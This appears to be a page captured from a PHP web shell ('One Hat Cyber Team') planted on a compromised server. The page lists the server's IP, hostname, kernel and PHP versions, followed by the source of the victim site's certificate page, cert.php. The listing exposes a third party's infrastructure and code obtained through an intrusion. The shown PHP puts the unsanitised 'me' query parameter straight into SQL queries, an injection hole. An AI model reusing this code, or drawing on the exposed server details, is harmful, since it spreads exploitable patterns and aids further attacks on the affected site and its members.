One Hat Cyber Team
Your IP :
216.73.216.240
Server IP :
162.240.106.28
Server :
Linux server.ganesand.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
Server Software :
Apache
PHP Version :
7.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
thoa
/
www
/
View File Name :
cert.php
<?php include('hijri.php'); include('config.php'); $me = $_GET['me']; ?> <!doctype html> <html class="no-js" lang="zxx"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Memebership Certificate</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Favicons --> <link rel="shortcut icon" href="images/logo/thoa.png"> <link rel="apple-touch-icon" href="images/logo/thoa.png"> <!-- Google font (font-family: 'Hind', sans-serif;) --> <link href="https://fonts.googleapis.com/css?family=Hind:300,400,500,600,700" rel="stylesheet"> <!-- Stylesheets --> <link rel="stylesheet" href="css/bootstrap.min.css"> <link rel="stylesheet" href="css/plugins.css"> <link rel="stylesheet" href="style.css"> <!-- Cusom css --> <link rel="stylesheet" href="css/custom.css"> <!-- Modernizer js --> <script src="js/vendor/modernizr-3.5.0.min.js"></script> </head> <style> .alla,.glow:hover { font-size: 80px; color: #fff; text-align: center; -webkit-animation: glow 1s ease-in-out infinite alternate; -moz-animation: glow 1s ease-in-out infinite alternate; animation: glow 1s ease-in-out infinite alternate; } .glow1 { -webkit-animation: glow 1s ease-in-out infinite alternate; -moz-animation: glow 1s ease-in-out infinite alternate; animation: glow 1s ease-in-out infinite alternate; } @-webkit-keyframes glow { from { text-shadow: 0 0 10px #fff, 0 0 20px #fff, 0 0 30px #e60073, 0 0 40px #e60073, 0 0 50px #e60073, 0 0 60px #e60073, 0 0 70px #e60073; } to { text-shadow: 0 0 20px #fff, 0 0 30px #ff4da6, 0 0 40px #ff4da6, 0 0 50px #ff4da6, 0 0 60px #ff4da6, 0 0 70px #ff4da6, 0 0 80px #ff4da6; } } #divBottomRight img { width: 40px; } #divBottomRight { position:absolute; z-index:10000; <!-- min-width: 142px; --> text-align: right!important; } #divBottomRight img, #acurax_si_simple img, #short_code_si_icon img { margin-left:1px; } #divBottomRight img:hover, #acurax_si_simple img:hover, #short_code_si_icon img:hover { opacity:0.8; } .center { text-align:center; } .hide{ list-style-type: none; } @media (max-width: 2100px) and (min-width: 781px) { .mform { width:100%!important; color:#000!important; border:1px solid #aaaaaa; padding:10px; font-weight: 600; } .accountbox-close-button { margin-top:50px; margin-right:50px; } .formtop { background: #e3e3e3; position: absolute; z-index: 23; padding:100px; width:100%; height:auto; } .meimg { width:150px;height:180px;border-radius: 8px;border: 1px solid #009047;margin-right:20px; } .cerdis { height:100%; min-height:780px; } } @media (max-width: 780px) { .mform { width:100%!important; color:#000!important; font-weight: 600; } .formtop { background: #e3e3e3; position: absolute; z-index: 23; width:100%; height:auto; } .meimg { width:150px;height:180px;border-radius: 8px;border: 1px solid #009047; margin-right:50px; } .cerdis { height:100%; min-height:100px; } } .single-input input { height: 40px; line-height: 42px; border: 1px solid #aaaaaa; background: transparent; font-size: 16px; font-weight: 600; color: #000; margin-top: -5px; } label { margin-bottom: 10px; margin-top:10px; } </style> <body> <!--[if lte IE 9]> <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="https://browsehappy.com/">upgrade your browser</a> to improve your experience and security.</p> <![endif]--> <!-- Main wrapper --> <!-- Login Form --> <div class="formtop"> <div class="accountbox__register tab-pane fade show active" id="profile" role="tabpanel" aria-labelledby="profile-tab" > <form action="#"> <?php $resultyr = mysqli_query($con,"SELECT * from year ORDER BY Y_ID DESC LIMIT 1"); $datayr = mysqli_fetch_array($resultyr); //$yr1=$datayr['Y_LIST']; $yr1="2023"; $table1 = mysqli_query($con,"select * from certificate where MEM_NO = '".$me."' and MEM_YR='".$yr1."'"); if($row1=mysqli_fetch_array($table1)) { ?> <div class="col-lg-12"> <aside class="pg-donation__personalinfo"> <iframe src="fpdf/front-<?php echo $row1['MEM_ID'];?>.pdf" width="100%" class="cerdis"></iframe> </aside> </div> <?php } else { $yr1= $yr1-1; $table1 = mysqli_query($con,"select * from certificate where MEM_NO = '".$me."' and MEM_YR='".$yr1."'"); if($row1=mysqli_fetch_array($table1)) { ?> <div class="col-lg-12"> <aside class="pg-donation__personalinfo"> <iframe src="fpdf/front-<?php echo $row1['MEM_ID'];?>.pdf" width="100%" class="cerdis"></iframe> </aside> </div> <?php } } ?> </form> </div> <a href="certificate.php" ><span class="accountbox-close-button" ><i class="icofont icofont-close"></i></span></a> </div> <!-- JS Files --> <script src="js/vendor/jquery-3.2.1.min.js"></script> <script src="js/angular.min.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/plugins.js"></script> <script src="js/salat-times.js"></script> <script src="js/active.js"></script> <script src="js/scripts.js"></script> </body> </html>